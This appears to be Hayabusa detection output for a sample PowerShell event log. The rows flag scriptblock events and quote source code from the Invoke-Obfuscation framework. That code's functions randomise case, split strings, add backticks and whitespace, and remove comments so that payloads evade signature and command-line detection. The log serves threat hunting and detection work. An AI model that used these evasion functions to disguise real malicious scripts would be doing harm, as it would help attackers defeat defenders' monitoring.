Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. 
If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. 
While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. 
Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. 
Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. 
.EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. 
# If the current token is greater than 1000 characters (as in SecureString or Base64 strings) then set $ConcatPercent much lower If($InputVal.Length -gt 25000) { $ConcatPercent = Get-Random -Minimum 0.05 -Maximum 0.10 } ElseIf($InputVal.Length -gt 1000) { $ConcatPercent = Get-Random -Minimum 2 -Maximum 4 } Else { $ConcatPercent = Get-Random -Minimum 15 -Maximum 30 } # Convert $ConcatPercent to the exact number of characters to concatenate in the current token. $ConcatCount = [Int]($InputVal.Length*($ConcatPercent/100)) # Guarantee that at least one concatenation will occur. If($ConcatCount -eq 0) { $ConcatCount = 1 } # Select random indexes on which to concatenate. $CharIndexesToConcat = (Get-Random -InputObject (1..($InputVal.Length-1)) -Count $ConcatCount) | Sort-Object # Perform inline concatenation. $LastIndex = 0 ForEach($IndexToObfuscate in $CharIndexesToConcat) { # Extract substring to concatenate with $ObfuscatedToken. $SubString = $InputVal.SubString($LastIndex,$IndexToObfuscate-$LastIndex) # Concatenate with quotes and addition operator. $ObfuscatedToken += $SubString + $Quote + ""+"" + $Quote $LastIndex = $IndexToObfuscate } # Add final substring. $ObfuscatedToken += $InputVal.SubString($LastIndex) $ObfuscatedToken += $FinalSubString # Add final quotes if necessary. If(!($ObfuscatedToken.StartsWith($Quote) -AND $ObfuscatedToken.EndsWith($Quote))) { $ObfuscatedToken = $Quote + $ObfuscatedToken + $Quote } # Remove any existing leading or trailing empty string concatenation. If($ObfuscatedToken.StartsWith(""''+"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(3) } If($ObfuscatedToken.EndsWith(""+''"")) { $ObfuscatedToken = $ObfuscatedToken.SubString(0,$ObfuscatedToken.Length-3) } Return $ObfuscatedToken } Function Out-RandomCase { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string or char[] by randomizing its case. 
Invoke-Obfuscation Function: Out-RandomCase Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCase obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputValStr Specifies the string to obfuscate. .PARAMETER InputVal Specifies the char[] to obfuscate. .EXAMPLE C:\PS> Out-RandomCase ""String to have case randomized"" STrINg to haVe caSe RAnDoMIzeD C:\PS> Out-RandomCase ([char[]]""String to have case randomized"") StrING TO HavE CASE randOmIzeD .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'Command' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'InputVal')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'InputValStr')] [ValidateNotNullOrEmpty()] [String] $InputValStr, [Parameter(Position = 0, ParameterSetName = 'InputVal')] [ValidateNotNullOrEmpty()] [Char[]] $InputVal ) If($PSBoundParameters['InputValStr']) { # Convert string to char array for easier manipulation. 
$InputVal = [Char[]]$InputValStr } # Randomly convert each character to upper- or lower-case. $OutputVal = ($InputVal | ForEach-Object {If((Get-Random -Minimum 0 -Maximum 2) -eq 0) {([String]$_).ToUpper()} Else {([String]$_).ToLower()}}) -Join '' Return $OutputVal } Function Out-RandomWhitespace { <# .SYNOPSIS Obfuscates operator/groupstart/groupend/statementseparator token by adding random amounts of whitespace before/after the token depending on the token value and its immediate surroundings in the input script. Invoke-Obfuscation Function: Out-RandomWhitespace Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomWhitespace adds random whitespace before/after a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Tokens Specifies the token array containing the token we will obfuscate. .PARAMETER Index Specifies the index of the token to obfuscate. 
.EXAMPLE C:\PS> $ScriptString = ""Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {If(($Tokens[$i].Type -eq 'Operator') -OR ($Tokens[$i].Type -eq 'GroupStart') -OR ($Tokens[$i].Type -eq 'GroupEnd')) {$ScriptString = Out-RandomWhitespace $ScriptString $Tokens $i}} C:\PS> $ScriptString Write-Host ('Hel'+ 'lo Wo' + 'rld!') -ForegroundColor Green; Write-Host ( 'Obfu' +'scation Ro' + 'cks!') -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host ('Hel'+'lo Wo'+'rld!') -ForegroundColor Green; Write-Host ('Obfu'+'scation Ro'+'cks!') -ForegroundColor Green} 'RandomWhitespace' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index ) $Token = $Tokens[$Index] $ObfuscatedToken = $Token.Content # Do not add DEFAULT setting in below Switch block. 
Switch($Token.Content) { '(' {$ObfuscatedToken = $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} ')' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken} ';' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '|' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '+' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '=' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '&' {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} '.' { # Retrieve character in script immediately preceding the current token If($Index -eq 0) {$PrevChar = ' '} Else {$PrevChar = $ScriptString.SubString($Token.Start-1,1)} # Only add randomized whitespace to . if it is acting as a standalone invoke operator (either at the beginning of the script or immediately preceded by ; or whitespace) If(($PrevChar -eq ' ') -OR ($PrevChar -eq ';')) {$ObfuscatedToken = ' '*(Get-Random -Minimum 0 -Maximum 3) + $ObfuscatedToken + ' '*(Get-Random -Minimum 0 -Maximum 3)} } } # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-RemoveComments { <# .SYNOPSIS Obfuscates variable token by removing all comment tokens. This is primarily since A/V uses strings in comments as part of many of their signatures for well known PowerShell scripts like Invoke-Mimikatz. 
Invoke-Obfuscation Function: Out-RemoveComments Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RemoveComments obfuscates a given token by removing all comment tokens from the provided PowerShell script to evade detection by simple IOCs or A/V signatures based on strings in PowerShell script comments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green #COMMENT"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Comment'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RemoveComments $ScriptString $Token} C:\PS> $ScriptString $Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green #COMMENT} 'Comment' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Remove current Comment token. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"n Rocks!' -ForegroundColor gReeN .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Convert $Token to character array for easier manipulation. $TokenArray = [Char[]]$Token.Content # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # Convert character array back to string. $ObfuscatedToken = $TokenArray -Join '' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ConcatenatedString { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any string by randomly concatenating it and encapsulating the result with input single- or double-quotes. Invoke-Obfuscation Function: Out-ConcatenatedString Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ConcatenatedString obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER InputVal Specifies the string to obfuscate. .PARAMETER Quote Specifies the single- or double-quote used to encapsulate the concatenated string. 
.EXAMPLE C:\PS> Out-ConcatenatedString ""String to be concatenated"" '""' ""String ""+""to be ""+""co""+""n""+""c""+""aten""+""at""+""ed .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $InputVal, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Char] $Quote ) # Strip leading and trailing single- or double-quotes if there are no more quotes of the same kind in $InputVal. # E.g. 'stringtoconcat' will have the leading and trailing quotes removed and will use $Quote. # But a string ""'G'+'"" passed to this function as 'G'+' will have all quotes remain as part of the $InputVal string. If($InputVal.Contains(""'"")) {$InputVal = $InputVal.Replace(""'"",""`'"")} If($InputVal.Contains('""')) {$InputVal = $InputVal.Replace('""','`""')} # Do nothing if string is of length 2 or less $ObfuscatedToken = '' If($InputVal.Length -le 2) { $ObfuscatedToken = $Quote + $InputVal + $Quote Return $ObfuscatedToken } # Choose a random percentage of characters to have concatenated in current token. 
